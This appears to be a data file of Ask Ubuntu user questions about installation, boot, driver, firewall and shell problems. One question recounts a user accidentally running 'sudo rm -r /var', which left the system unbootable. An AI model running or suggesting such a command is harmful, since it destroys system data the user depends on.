461083	ubuntu 14.04 trusty with uefi + software raid1	how to install ubuntu on uefi bios with software raid1 ? should there be 1 partition for efi and another partition for raid1 ( root+swap ) on each drive ? i wonder how it will update one efi partition to the other if it 's not in raid1 mode ? will the update-grub-efi command will update both efi partitions on both drives like the one in legacy bios by using only the update-grub2 command ? i 'm using intel serverboard s1200v3rpl motherboard with xeon e-1275 v3 processor . the usb installer is recognized as uefi : usb while the ssd is p0+p1 ssd . i assume the motherboard recognizes the ssd as in legacy bios , right ? what is better for ease of use and stability , uefi or legacy bios ? been googling around but to no luck .
461084	start-up error ( alert ! /dev/disk/by-uuid/xxxxxxxxx does not exist . dropping to a shell ! )	i got serius problem with ubuntu 14.04 please help me . when i start my computer its says following errors : — boot args ( cat /proc/cmdline ) — check rootdelay= ( did the system wait long enough ? ) — check root= ( did the system wait for the right device ? ) — missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/xxxxxxxxx does not exist . dropping to a shell ! busybox v.1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for list of built-in commands . ( initramfs ) i got this error earlier but it fixed autamaticly but this it keeps saying this errors . please please help me . update from comments below sudo blkid /dev/sda1 : label= '' backu '' uuid= '' c4406f0a406fo312 '' type = `` ntfs '' /dev/sda3 : label= '' linux '' c6e7b2c6-5e8f-4a2d-b666-9489ef7c7c8f '' type = `` ext4 '' /dev/sda5 : uuid= '' 6e0361c9-bbb6-4395-a75e-ef8d645245d0 '' type = `` ext4 '' /dev/sda6 : uuid= '' 740f28da-723a-40d3-995b-3d5dc0d30120 '' type = `` ext4 '' /dev/sda7 : uuid= '' 30c1ba3b-dd3e-4ec2-989b-2e3a3d0d30d8067 '' type = `` ext4 '' /dev/sda8 : uuid= '' 06145b6-0538-4a4b-b424-a5f7a732e8e1 '' type = `` swap ''
461085	configuration for ufw to allow upnp between desktop and xbox360	i am really stuck with this question . i am using ubuntu 14.04 i can not enable ufw to allow a connection between my desktop and xbox 360 stream media when ufw is enbaled . the connection and streaming works perfectly when ufw is disabled . i know that the network ip address of my xbox 360 is 192.168.0.20 i would appreciate it if someone could share the code i need to apply to enable streaming with ufw enabled . i have reviewed ufw documentation etc and find the examples either confusingh or not relevant to my use case appreciate any helps that can be offered
461089	dual boot with windows 7 ubuntu 14 not working	i have 3 hard drives on the pc : 1st drive 1 tb with windows7 3 patritions 2nd drive 500 gb data 3rd drive 40 gb drive empty where the ubuntu installed it self . perfect now i restart pc only windows boots ... no ubuntu ? am i missing some kind of boot manager ?
461090	ubuntu installation alongside vista to uninstall vista later	if i decide to install ubuntu alongside vista , in order to try it first , can i disintall vista afterwards ?
461091	my ubuntu 14.04 lts does n't have sound	i installed ubuntu 14.04 on vmware workstation version 10.0.0 on my windows 7 machine . after installing i figured out that it does n't have any sound so i checked the sound settings . all items seem to be at their default states and correct . any suggestion to find the problem ?
461093	volume buttons not working in 14.04	when using the volume buttons ( + , - , mute ) there is no reaction , neither on laptop keyboard nor on usb keyboard . no popup , no volume change , and no sound indication . volume control with the mouse works fine . the buttons are working and get recognized : checked with keyboard system settings tool : they get recognized by the tool both from the laptop directly as well as from my usb keyboard . who can help ?
461096	i am not able to install hp laserjet 1007/8 in ubuntu 12.04 , please help	i have installed ubuntu 11.10 and 12.04 in two pc earlier running in win xp . the printer hp laser jet 1007/1008 are not detected and the problem is not solved even after connected to internet . please help .
461097	unknown authentication request	when i staring ubuntu , and when i am logging in the window with name authentication request is poping up . there is sad : please type in password for account `` personal/work '' . i am trying my standard passwords but it is sad that it is wrong . when i am trying to find personal/work in my file system i cant find it . it was n't hapening before with this window . how can i solve that problem ? best regards
461099	deploying ubuntu in a public school - image creation and updates	i am currently planning to replace windows xp on 58 intel machines that we have . i have been researching to do this , and before i set it in motion i would like to get some feedback on my plan . in short : i want to use the guest feature so nothing can be changed or saved on the computer and that it always will reset back . we are a google apps for education school , so i need to make sure that chrome is the default browser and remove any office applications . so that the students do n't confused about what to use . i need to clone the settings and deploy them to each machine and make sure the ubuntu installation updates itself in the background , so that the machines are always up to date . my plan is to : enable guest session and if possible , rename it to student login or similar . install ubuntu on one machine , do the settings , install chrome , remove firefox and libreoffice . use clonezilla to mass deploy the system to the rest of the machines . enablesudo apt-get install unattended-upgrades so that the systems are always running the latest version . how does that sound ? all student data is stored in the cloud , so i do n't need any local space and all the apps are also provided with chrome .
461102	change the window resize mouse button for kubuntu-desktop	i am using alt + right click to resize windows . how do i change it to alt + middle click ? i am on ubuntu 12.04 using kubuntu-desktop i.e . kde plasma
461104	why does n't ubuntu have an hourglass to tell you when programmes are launching ?	i 'm still new to ubuntu and using a very modest netbook to which ubuntu adapts very well . however , it took me a while to realise that it took just a single click to launch programmes because nothing happened for twenty seconds ! surely there is an option to show something that tells me `` wait , i 'm working as hard as i can '' ?
461110	installing ubuntu with evga nvidia 660 results in corrupted video output	trying to install ubuntu 14.04 on a dual boot pc along side windows 8.1 pro x64 . when i get to the install screen the ubuntu logo and the 4 dots show up fine but when the desktop try 's to load it is corrupted i only see layers of colors and an unrecognizable slanted desktop . is there a way to add the graphics driver to the usb install ? or is there a safe mode install ? system : intel core i5-2500k 3.3ghz turbo processor evga nvidia 660 ti graphics card 3gb/mem 1st ssd ocz 256gb windows 8.1 installed 2nd 10k raptor hard drive 300gb dedicated for ubuntu 16gb ddr3 dual channel mother board : evga z68 monitor : dell 24 '' 1920x1200 using hdmi from graphics card to display .
461114	how to share a directory between ubuntu host and windows guest with kvm ?	i read several posts or articles which deal with this but all give a solution for linux guest . for example : http : //www.linux-kvm.org/page/9p_virtio http : //troglobit.com/blog/2013/07/05/file-system-pass-through-in-kvm-slash-qemu-slash-libvirt/ i also heard about using a samba server or something like that . does anybody know precisely how to set up a working solution ?
461120	calculating postfix expressions using stack	what is wrong with my calculate function ? all other functions work fine but when i try to calculate a post fix expression , it adds some weird symbols to my stack . void push ( char operand ) { ++top ; stack [ top ] = operand ; printf ( `` stack : % s \n '' , stack ) ; } int pop ( char operand ) { int ret ; if ( top == -1 ) { ret = 0 ; } else { ret = stack [ top ] ; -- top ; } return ret ; } int checkerrors ( char array [ 10 ] [ 100 ] ) { int l ; int m ; for ( l=0 ; l < i ; l++ ) { for ( m=0 ; m < 100 ; m++ ) { if ( ( array [ l ] [ m ] ! = '\0 ' ) & & ( ( array [ l ] [ m ] == ' $ ' ) || ( array [ l ] [ m ] == ' @ ' ) ) ) { m++ ; printf ( `` equation % d is invalid\n '' , l ) ; return 1 ; } } } } void postfix ( char eqarray [ 100 ] ) { int j ; int k=0 ; char op1 ; memset ( & pf , '\0',100 ) ; memset ( & stack , '\0',20 ) ; top=-1 ; int length=strlen ( eqarray ) ; //if ( ! checkerrors ) & & & & & & add the paranthesis stuff for ( j=0 ; j < length ; j++ ) { op1=eqarray [ j ] ; if ( op1== ' ) ' ) { while ( stack [ top ] ! = ' ( ' ) pop ( stack [ top ] ) ; //pf [ k ] =stack [ top ] ; //k++ ; } else if ( eqarray [ j ] ! ='+ ' & & eqarray [ j ] ! ='- ' & & eqarray [ j ] ! ='* ' & & eqarray [ j ] ! ='/ ' & & eqarray [ j ] ! = ' ' & & eqarray [ j ] ! = ' ( ' ) { pf [ k ] = eqarray [ j ] ; k++ ; } else if ( top==-1 ) { push ( op1 ) ; } else if ( isprior ( op1 , stack [ top ] ) ) { pf [ k ] =stack [ top ] ; pop ( stack [ top ] ) ; push ( op1 ) ; k++ ; } else push ( op1 ) ; } while ( top ! =-1 ) { pf [ k ] =stack [ top ] ; pop ( stack [ top ] ) ; k++ ; } printf ( `` postfix : % s \n '' , pf ) ; } int isprior ( char op1 , char op2 ) { if ( ( op1=='* ' ) || ( op1=='/ ' ) ) return 1 ; else if ( ( op1=='+ ' ) || ( op1=='- ' ) || ( op1== ' ( ' ) ) return 0 ; } double calculate ( char pf [ 100 ] ) { int q ; char num ; int answer ; memset ( & stack , '\0',20 ) ; top=-1 ; int length2=strlen ( pf ) ; char op1 , op2 ; for ( q=0 ; q < length2 ; q++ ) { num=pf [ q ] ; if ( isdigit ( pf [ q ] ) ) { push ( num ) ; } else { op2=stack [ top ] ; pop ( stack [ top ] ) ; op1=stack [ top ] ; pop ( stack [ top ] ) ; switch ( num ) { case '+ ' : pop ( stack [ top ] ) ; push ( ( op1+op2 ) - '0 ' ) ; break ; case '- ' : push ( ( op1-op2 ) - '0 ' ) ; break ; case '* ' : push ( ( op1*op2 ) - '0 ' ) ; break ; case '/ ' : push ( ( op1/op2 ) - '0 ' ) ; break ; } } } return 0 ; }
461125	sylpheed is still in the menu	i installed lubuntu 14.04 and thunderbird so i uninstalled sylpheed , but it is still in the main menu ! nothing happens when clicking the menu item , but anyway i would like to have it removed . i have tried to install sylpheed again - still only 1 `` sylpheed menu item '' - and then uninstall it again - but it still remains in the menu . how can i remove it from the menu ?
461129	simply listening music by folders ?	i 'm currently fighting both rhythmbox and banshee for an easy way to just browse and play my music by folders . i do n't want to create stupid playlists . and seems that there is no way ?
461130	cant find software i downloaded	i 'm new to ubuntu & i downloaded software from the ubuntu software centre & now i ca n't find it anywhere . the file is called partition scanner and disk recovery tool .
461133	ubuntu 12.10 install ispconfig	hey guys i am currently working on this installation tutorial for ubuntu 12.10 with ispconfig/bind/dovecot . i am currently stuck on page 4 the section where you you are attempting to start php-fpm . when i attempt to start originally it gave me a directory not found error for /opt/php-5.3.18/sbin/php-fpm so i created the directory and assigned permissions . now when i start it i get the following : starting php-fpm /etc/init.d/php-5.3.28-fpm : 49 : /etc/init.d/php-5.3.28-fpm : /opt/php- 5.3.28/sbin/php-fpm : permission denied failed i checked the permissions and i am pretty sure everything for this directory is the same for all the others . i ran ls -l and got the following : drwxr-xr-x 2 root root 4096 apr 10 15:19 php-fpm then i read over the init script that it had me copy in and i can see where it is calling it . i just do n't understand how to fix the situation . any help is appreciated !
461135	copy mp4 files to dvd	how can i copy mp4 files from my hard disk to a dvd in ubuntu 13.10 in my laptop ? is there any program or application compatible with ubuntu 13.10 to do this ?
461139	run a script on detecting modem	my problem is i am not able to run script automaticlly when modem is connected . i need a code to be run when my modem is detected . i am having a photon modem and i am using sakis3g script to connect to internet . i have to run sudo sakis3g connect in terminal to connect my modem . i have made this code to run without password by editing sudoers list . after that i can connect modem by just typing sudo sakis3g connect in terminal . i was reading this post about run a script automatically when usb is mounted and was following steps . my lsusb output is like modem is zte wcdma technologies msm i noted down id `` 19d2:1254 '' ran command sudoedit /etc/udev/rules.d/mount-modem.rules edited rules to action== '' add '' , attrs { idvendor } == '' 19d2 '' , attrs { idproduct } == '' 1254 '' , run+= '' /home/bibi/bin/modem.sh '' my modem.sh is i am able to run modem.sh from terminal and connect modem . but when usb modem is removed and connected script is not running . i dont know whether i missed anything . thanks edit . it is working ... . no changes were made . problem was delay was a little more that made me think not working . thank you
461140	how to install digikam on ubuntu 14.04 ?	it seems that digikam was removed from ubuntu 14.04 . why was that ? considering that digikam is the only photo organizer which works with geo-tagged photos , what would be the best way to install digikam in ubuntu 14.04 ? note that trying to install or search for digikam turns up nothing : ubuntu @ ubuntu : ~ $ sudo aptitude search digikam ubuntu @ ubuntu : ~ $ also , clicking the .deb from ubuntuupdates opens the ubuntu software center which states that the dependencies for digikam can not be satisfied .
461143	ubuntu virtual machine export	is it possible to backup my ubuntu os ( not virtualized ) and restore it in virtual environment ( such as virtualbox ) ? or export installed ubuntu as virtual machine ?
461144	how to replace spaces with newlines/enter in a text-file ?	i have simple text file named `` example '' . reading with terminal command : cat example output : abc cdef ghi jk lmnopq rst uv wxyz i want to convert ( transform ) into following form : ( expected output from cat example ) abc cdef ghi jk lmnopq rst uv wxyz how can i do this via the command-line ? ( this is only an example file , i want to convert word 's position in vertical-column )
461146	restoring higher resolution after installing ubuntu 14.04 with nomodset	i 've installed ubuntu 14.04 on my thinkpad t420 which has nvidia optimus gpu , using nomodset option but after installation i 'm not able to get the full resolution . can someone please guide me how to resolve this issue ?
461149	wireless network card is dectected but not working	i installed ubuntu 12.04 lts in my hp laptop . my wireless card is not working . but , i could see wireless controller in lspci and lshw -c network . here , i have enclosed the output . whether should i need to install any specific drivers ? if so , what are the drivers ? lspci -k : 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 07 ) subsystem : hewlett-packard company device 2190 kernel driver in use : r8169 kernel modules : r8169 03:00.0 network controller : atheros communications inc. device 0036 ( rev 01 ) subsystem : hewlett-packard company device 217f lshw -c network : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 07 serial : fc:15 : b4:05:02:59 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a ip=192.168.12.190 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:105 ioport:1000 ( size=256 ) memory:90600000-90600fff memory:90400000-90403fff *-network unclaimed description : network controller product : atheros communications inc. vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory:90500000-9057ffff memory:90580000-9058ffff iwconfig : lo no wireless extensions . eth0 no wireless extensions . i do n't why my wireless network is unclaimed . guide me to fix this issue .
461150	ubuntu 14.04 gnome permanent widget ?	i have ubuntu gnome 14.04 , and what i am wondering is if there is a way i can create a trillian , and skype desktop widget ? yes , i do have both installed and configured already .
461152	how to restore the default toolbox windows in gimp ?	i have recently installed gimp 2.8.6 on ubuntu 14.04 lts 64-bit and for the first time when i opened it , two windows along with the main window were available , but now i can only see a single main window . how can i bring those default windows back ?
461158	ubuntu detects my partitions incorrectly	every time i make changes in partitions , this happens : error : unknown filesystem entering rescue mode ... grub rescue > then i have to fix it with boot-repair like this . first i had windows 7 and ubuntu installed as a dual boot . then i decided to add windows 8.1 , so i resized the partition -2- ( these are marked on a screenshot ) and created -5- and installed windows 8.1 there . then there 's the problem , it joined up with -3- and also ubuntu thinks my d : drive is located at the end -4- and shows it there while it shows empty space on where it actually is -6-. and seriously ? my hard drive only had 500gb , not 344+344+the rest . so how do i fix the problem with the d : drive and also i want -3- to only contain -7- and -8-. or wait ... why does -3- even exist ? how do i get rid of it ? anyway , can anyone help me out and explain my situation ? or will simply reinstalling the whole ubuntu reset everything to normal ? to keep it simple ... . and here 's how acronis disk director shows my partitions on windows . i think this is correct .
461162	can not write bytes : broken	i am getting an error at beginning while booting itself and so i ca n't get to my desktop . when i boot i select ubuntu and then after disabled bios messages i run directly into the black screen with broken pipe error . in my previous session i had physically removed opencv folder which had all it 's libraries and avr32 toolchain which was not associated and was unused . plus i had done : sudo apt-get autoremove sudo apt-get update and then i shut down . next morning i have this broken pipe error ! now , i have no idea what i should do . thank god i have win7 on dual boot so at least i can get help from forum . please reply
461170	2048 game will not open ( ubuntu 14.04 in vmware player )	i 've found this site : http : //www.unixmen.com/install-2048-game-ubuntu/ i downloaded the open-source puzzler @ http : //sourceforge.net/projects/linuxfreedomfor/files/ubuntu/2048_1_all.deb & installed it via terminal : sudo dpkg -i 2048_1_all.deb when i launch the 2048 game from the unity dash it will not open .
461172	ubuntu 14.04 does n't show last modification hour when paste conflicting files	i have just installed ubuntu 14.04 lts and i am working on some c files which i created a week ago . i tried to copy those files into another backup folder on my usb key , where they were already present . since the name of the files is the same , it asked me if i wanted to replace the files in that folder or if i wanted to ignore the copy/paste operation . however , the window for the conflicting files compares only the date of the last modification of the two files , and not the hour . this is very bad since it is possible that i override the file written in the afternoon with the one written in the morning . is this normal in 14.04 ? is there a way to solve the problem ? thanks .
461175	lubuntu to provide menu access to skype for alternate users	i have installed skype on lubuntu 14.04 using the owner account . the owner can invoke it through the menu selections internet > skype . the kids account can run skype by selecting run and typing skype . it would be better for the kids account to have menu access to skype . how can this be done ?
461179	how to save as gif in gthumb	i edited a gif image ( no animations ) with gthumb and on trying to save i encountered the error : could not save the file could not find a suitable module to save the image as `` image/gif '' i jumped over to the preferences only to find save as gif is n't there . only jpg , png , tiff , tga , webp . is there any way i can save an image as gif from gthumb without converting it to the other formats ?
461180	bitdefender not working in ubuntu 14.04	i installed bitdenfeder using various methods but the antivirus engine 's never loaded and whenever i tried to update them bitdefeder used to close . i uninstalled it everytime to try a new method but everytime the result was same . last time i installed bit defender using http : //linuxg.net/how-to-install-bitdefender-on-ubuntu-14-04-13-10-13-04-12-10-12-04-linux-mint-16-15-14-13-pear-os-8-7-and-elementary-os-0-2/ but the problem has remained . please suggest solutions . thanks
461182	font rendering problems with qt applications in xubuntu	i 'm currently using xubuntu 14.04 but the same problem is present in 13.10 and 13.04 , and maybe in previous versions . i always install truetype fonts and remove the anti-alias . in all the gtk applications the fonts look perfect , but in qt applications like scribus of calibre the fonts have render problems . i included a image where you have an screen capture of a gtk application and a qt application together . underlined in red is the word `` editar '' . look at how the `` a '' and the `` r '' are together in the qt application ( right side ) . i already installed qtcurve and adjusted the settings but nothing happens . also followed the guide here ( http : //mikemcquaid.com/2011/12/01/make-qt-use-the-gtk-style-on-xfce-or-xubuntu/ ) and nothing happens . here is the image : gtk and qt applications side by side xangua , thanks for your help . i already tried using qt configuration but it did n't work . i included an image of how the fonts look on qt applications . as you can see in the image , sometimes the letters `` join '' .
461184	hp scanjet 4890 does not work properly in ubuntu 14.04	i recently installed ubuntu 14.04 and was setting up the perifrials . all went well and the scanner recognized right away though as a scanjet 4850c instead of a 4890 . i tried simple scan and only got black . i tried various settings and with a fresh start of simple scan i am able to scan at 150dpi greyscale only . i read some helps on the web and they suggested xsane . i installed that and can now scan in both color and grey scale but still only at 150dpi . any other resolution results only in a black image . any help would be appreciated . i think this is a bug that many need some updates . many thanks ,
461186	how to preserve hypertext links while pasting in libreoffice ?	in ubuntu 12.04 , when cutting and pasting text from a web browser into libreoffice , any hypertext links on the text are properly formatted and preserved . but in ubuntu 14.04 , only the text is copied . all the hypertext links are lost . ( though cutting and pasting within libreoffice preserves the links ) . is there anything i can do to restore the 12.04 cut-and-paste behavior in 14.04 ?
461187	gdl installation of obligatory libraries	i installed gdl , but i could not run any idl code with it . do i need to install additional libraries to make it work ? if so , how can i install additional libraries ?
461189	add printer not working	when i bring up printers and then click add printer the program just closes , when running sudo system-config-printer in the command terminal i get this error message . error in `/usr/bin/python ' : double free or corruption ( out ) : 0x00000000013437f0 do n't know what it means or how to fix it , can someone please explain ?
461190	jenkins git ubuntu server	i am trying to install a completely working jenkins on my old pc with ubuntu server 12.04 . i think my installation of ubuntu server and jenkins was succesfull . i can access the jenkins page by internet from any computer . so now i want jenkins to access my private gitrepo on bitbucket.com . i have found this tutorial : configuring jenkins git tutorial and i am stuck with step 3.5 . with says do this : cd /srv/jenkins/jobs/project/workspace git config user.email `` some @ email.com '' git config user.name `` jenkins '' but with the first command i get the error : -su cd : /srv/jenkins/jobs/project/workspace : no such file or directory do i have to make this folder ? but when i do : mkdir /srv/jenkins/jobs/project/workspace mkdir : can not create directory '/srv/jenkins/jobs/project/workspace ' : no such file or directory i do n't know much about all these things , because i am fairly new to this . i have come this far just because of all the tutorial on the internet , but now i am stuck : ( edit : i have tried the commando : mkdir -p /srv/jenkins/jobs/project/workspace mkdir : can not create directory : '/srv/jenkins ' : permission denied so i guess this is not the solution , because user jenkins does n't have sudo rights . i hope some has another suggestion .
461191	what is the meaning of : a ; $ ! n ; in a sed command ?	$ ( echo hello ; echo there ) | sed ' : a ; $ ! n ; s/\n/string/ ; ta' hellostringthere above sed command replaces new line character with the string `` string '' . but i do n't know the meaning of : a ; $ ! n ; s/\n/string/ ; ta within the single quotes . i know the middle part s/\n/string/ . but i do n't know the function of first ( : a ; $ ! n ; ) and last ( ta ) part .
461193	cloning with dd command	how can i back-up a partition ( not the whole disk ) to another partition on an external hard-disk using dd ? i achived this with the following command : sudo dd if=/dev/sda6 of=/dev/sdb3 bs=1m however my requirements are : i need to backup /dev/sda6 and store that as an image ( .img ) file in /dev/sdb3 preferably as a compressed ( .gz ) image file ( this is actually what i am trying to achieve ) ( here are my foolish attempts that , obviously , did n't work : sudo dd if=/dev/sda6 of=/dev/sdb3/backup.img bs=4096 conv=notrunc , noerror sudo dd bs=1m if=/dev/sda6 | gzip -c > /dev/sdb3/backup.gz thank you for your time and kindness in advance !
461195	external usb numeric keypad not working ubuntu 14.04	i have a dicota usb external numeric keypad , i bought it so i could use blender 3d software . it works fine on windows but in ubuntu linux 14.04 none of the buttons work the num lock button lights up and i can plug a mouse into the usb sockets on the keypad and that works ? i have tried to find the settings for it but found nothing i installed gnome tweaks but still ca n't get it to do anything ? i have an hp pavilion g4 laptop running ubuntu 14.04 any help with the settings would very much appreciated . thank you
461202	i just installed ubuntu 14.04 but there is not boot option	i have a notebook with win 8 ( uefi ) on it so i decided to install ubuntu 14.04 . i installed it on not uefi mode i created 2 partitions a swap memory and then an ext4 and installed ubuntu everything fine . now i am trying to boot into ubuntu but i ca n't when i turn on pc it boots automatically on windows 8 ( no purple screen ) i go to bios but there is no option to to boot on ubuntu . pls tell me how to fix this .
461203	keyboard shortcuts not working anymore in xfce	although everything was working perfectly well , keyboard shortcuts like alt+f4 , alt+tab , etc . have suddenly stopped working in my xubuntu 14/xfce4 installation . nothing happens if i hit them , and oddly , if i try to close a terminal by alt+f4 , the letters ; 3s get written in the console . of course , the shortcuts in `` settings > window manager > keyboard '' are all correctly configured , and i have checked in xev that the keys are still mapped correctly . output of ps -ef | grep xfce : http : //pastebin.com/r44jzbp5 output of cat ~/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xmlhttp : //pastebin.com/gy7nzxcv where could this come from ? edit : i localized the problem : it comes from xmodmap : i have a .xmodmap file in my home folder , containing only keycode 21 = asciicircum dead_grave dead_circumflex dead_grave dead_tilde dead_ogonek dead_tilde keycode 77 = nosymbol nosymbol nosymbol ( so nothing related to alt ) . if i remove it , shortcuts work again . why ? how could i have both working at the same time ?
461204	ca n't get ubuntu to install â 	every time i try and download linux , it just pulls up a cd burner program . iâve tried 3 different machines , and they all do the same thing . after the 20 minute download , the linux icon comes up on my desktop , i click it , and the cd burner program opens . so i tried burning it onto a dvd . after it burns i restart cpu , and boot from cd drive . it says it failed , so i restart normally , open up the cd , double-click the contents , and it just opens the cd burner program again . i 've been trying this for almost a week now on 3 different machines , and i can not for the life of me figure it out .
461208	virtualmin dns problems	i 'm pretty new to ubuntu and virtualmin and i got a problem . i 'm creating a webserver with virtualmin local use only ( it 's running on virtualbox ) so the ip is 10.0.2.15 and i 'm trying to make the dns work . according to virtualmin it should add everything to the dns records on his own , but i can access my website from the ip but not from the domain name . any help ? please be detailled i 'm pretty new at this . thanks in advance !
461212	icedtea-web 1.5 needs confirmation to run trusted applet	i 've got ubuntu 14.04 64 bit . i 'm using firefox 29 and icedtea as java . `` about : plugin '' in firefox : icedtea-web plugin ( using icedtea-web 1.5 ( 1.5-1ubuntu1 ) ) now i 've setup firefox to ask to activate before launching java from trusted sites . whenever i launch any service that uses java i get the `` java web start '' applet that asks if i 'm sure if i want to run this application . i can say yes or no , and tick a box to remember the answer . this is the problem at hand ; icedtea-web ca n't remember the answer if i check the `` yes '' button . java works fine when it is started . i have tried to purge all java and reinstalled openjdk-7 , java web start and icedtea web-controlpanel . i 've tried to play around with the control panel for java web start but with no success .
461214	uefi , nvram , and portable installed usb drives	i would like to know how to create a portable installed ubuntu system that is bootable in uefi , as opposed to a persistent live system . i think i am encountering problems with non-volitile ram . i basically followed the procedure outlined in portable installed system that boots in uefi as well as bios mode , with several modifications . my laptop only boots in uefi and does not have a bios ( legacy , or uefi disabled ) mode , so i skipped the bios portion . the steps i used are as follows : on the target usb drive , create a gpt partition table , an efi partition , root partition , and swap partition . remove the internal hard drive on the laptop to make sure it is not altered or its efi partition is not used . power on the laptop with a liveusb stick and install ubuntu 14.04 desktop 64-bit using 'something else ' . power on the laptop with the target usb drive . the system boots successfully . power on the laptop without any attached media . this causes a no bootable media error . power on the laptop with the target usb drive . the system no longer boots . power on the laptop with a liveusb stick , install boot-repair , attach the target usb drive , and run boot-repair . power on the laptop with the target usb drive . the system boots successfully . power on the laptop without any attached media . this causes a no bootable media error . power on the laptop with the target usb drive . the system no longer boots . my understanding is that uefi stores the boot loaders in the efi partition but keeps references to them in non-volatile ram . when i powered up the laptop without the target usb drive in steps 5 and 9 , the references were deleted and the target drive became un-bootable in steps 6 and 10. boot-repair is a symptomatic fix but not a permanent solution . although i am able to install ubuntu on a usb drive , it is not portable and relies on nvram . my questions are : a ) what am i doing wrong ? b ) why are liveusb sticks portable , but not my target usb drive ? c ) when i reattached my internal hard drive , the laptop is able to find windows . how is this different from my usb drive ? d ) is there a fix for this ?
461217	`` error : kernel configuration is invalid ''	i have been stuck on this issue for two days now and couldnt find a fix for this . i installed a realtime kernel with sudo apt-get install linux-rt because kaunet ( which is an ipfw extension ) requires a real-time kernel for millisecond granularity . however after trying to install kaunet i get this error message : error : kernel configuration is invalid . include/linux/autoconf.h or include/config/auto.conf are missing run 'make oldconfig & & make prepare ' on kernel src to fix it . both files are there . auto.confcan be found in /usr/src/linux-headers-2.6.31-10-rt/include/config and autoconf.h is in /usr/src/linux-headers-2.6.31-10-rt/include/linux . before i installed 2.6.31-10-rt kernel i was on 2.6.32-21-generic and kaunet/ipfw was working . i appreciate any help . thanks .
461218	how should i mount the main partition when using `` set partitions manually '' ?	while installing lubuntu , i choose to set partitions manually . now i 'm facing an `` i do n't know what to do '' moment . for the main partition , i choose an ext4 file system but i do n't know what to select for : mount point and bootable flag as this will be the primary partition ( where os will be ) i choose / as mount point and set on the bootable flag ( default is off ) . am i doing it wrong ?
461222	uploading to server and creating folder	hi all so i 'm trying to upload some files to my friends computer vis ssh server . but im kind of faltering in the right command to use . also i want to create a folder within the server so it can stay organized but im a little confused on how to do that as well . any and all help is much appreciated . thanks !
461223	steam missing package libcurl3.7.34 on ubuntu 14.04 64bit ?	here is my problem : i 'm trying to install steam and i got this error : sudo apt-get install steam-launcher the following packages have unmet dependencies : steam-launcher : depends : curl e : unable to correct problems , you have held broken packages . so i try to install curl and i got this : sudo apt-get install curl the following packages have unmet dependencies : curl : depends : libcurl3 ( = 7.34.0-1ubuntu1 ) but 7.35.0-1ubuntu2 is to be installed e : unable to correct problems , you have held broken packages . i have the latest version of libcurl3 ( 7.35 ) . so how can i install an old version of libcurl3 ( 7.34 ) ? i searched here but have not found anything .
461225	new user with very slow screen draw	i have loaded ubuntu 14.04 and it runs very slowly . i 've seen a number of suggestions about using 2d or lightdm but i ca n't use these : my login asks for password but does n't display the logo that would offer a choice of dm i tried `` sudo dpkg-reconfigure gdm '' but the system reported `` package 'gdm ' is not installed and no information is available '' . the symptoms look like those reported as graphics incompatibility ( 1 character per second in the search text entry , slow and jerky redraw , very jerky youtube , also sections of the screen sometimes look as if they are just displaying interference ) but i do n't know how to identify the problem . the pc is ok under windows xp ( it 's a dell desktop , pentuium 4 , circa 2006 ) but for how long is anyone 's guess . is there a way to determine ( and hence rectify ) the exact problem ?
461233	thinkfan config for x240	i just installed ubuntu 14.04 on my thinkpad x240 and was playing around with thinkfan ( see http : //thinkwiki.de/thinkfan [ german ] and how to control fan speed ? ) a bit . however , i was not able to find a good config by myself or online . most configs i produced let to a slow turning fan ( mode 0 - 2 , so 0 - 3000 ~rpm ) , but once i started to actually do something ( like `` only '' browsing ) , the fan jumped into mode 7 and went a crazy for a few seconds . does anyone have a thinkfan config for haswell related cpus and/or the newer thinkpad models which she/he would like to share ?
461234	solution for by mistakenly deleting var folder from home directory	i am new to ubuntu . i am failing to start ubuntu 12.04 lts 64-bit ... i was trying to move one of my files from one place to another and by mistake i deleted the var folder using sudo rm -r /var folder from the home directory . i tried restarting my laptop and then i ended up at this . the image is taken from my cell phone which is of low quality . i tried my best to figure this out , but failed . please help me out in this . thanks ...
461239	ubuntu does not recognize 8gb of ram	i have just installed ubuntu 14.04 64-bit on my laptop and on the system monitor it only shows 7.2 gb of ram and not 8 gb . why is that ?
461240	is there ubuntu server for 32bit systems ?	please help ! i have 3 desktops and 1 laptop and bring the laptop everywhere and keep the 3 desktops at home and they all have ubuntu on them and i would like to access media and any kind of files i have on all of them through or with my laptop when i 'm traveling ! all 3 desktops and 1 laptop are all 32 bit systems ! so how can i install and run ubuntu server on 32 bit systems ?
461241	problems with installing ubuntu on an hp laptop	dear ubuntu community , i was wondering how one would install ubuntu 13.10 on an hp pavillion g6 laptop . i tried from a live cd but had no luck . so mageia worked after trying suse , mint and ubuntu . does anyone have any ideas how i could install ubuntu ? and if it could be done , would i have problems with drivers for things or software repositories ?
461242	ca n't install ubuntu 14.04 on thinkpad w510 - freezes at black screen	i ca n't install ubuntu-14.04-desktop-amd64 on my lenovo thinkpad w510 , using usb . i want a dual boot with win7 and the latter is already installed . installing ubuntu 9.04 from an old live cd was possible without any problem , but after creating a bootable usb stick with universal usb installer according to ubuntu instructions , i simply ca n't get past the menu and i ca n't do anything from there . whether i press try without installing , install or check disc ... i get to a black screen with some text on it . i waited for more than 10 minutes to no avail . using f6 , i enabled nomodeset , but that did not solve anything . i also checked the iso md5sum before burning and it was [ ok ] . any ideas , please and thank you very much ! //later edit : fixed by using another usb stick .
